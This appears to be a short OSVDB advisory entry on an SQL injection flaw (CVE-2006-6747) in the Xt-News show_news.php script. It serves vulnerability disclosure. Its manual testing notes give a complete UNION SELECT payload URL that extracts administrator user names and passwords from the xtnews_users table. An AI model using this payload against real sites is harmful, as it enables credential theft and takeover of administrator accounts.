Xt-News show_news.php id_news Variable SQL Injection

2006-12-21T04:49:04
ID: OSVDB:32440
Type: osvdb
Reporter: OSVDB
Modified: 2006-12-21T04:49:04

Description

Manual Testing Notes

http://[target]/[script_news_path]/show_news.php?id_news=-1 UNION SELECT id,user,null,null,mdp,null,null,null,null,null,null FROM xtnews_users WHERE admin=1#

References:

Secunia Advisory ID: 23456
Related OSVDB ID: 32438
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-12/0371.html
ISS X-Force ID: 31147
FrSIRT Advisory: ADV-2006-5145
CVE-2006-6747
Bugtraq ID: 21719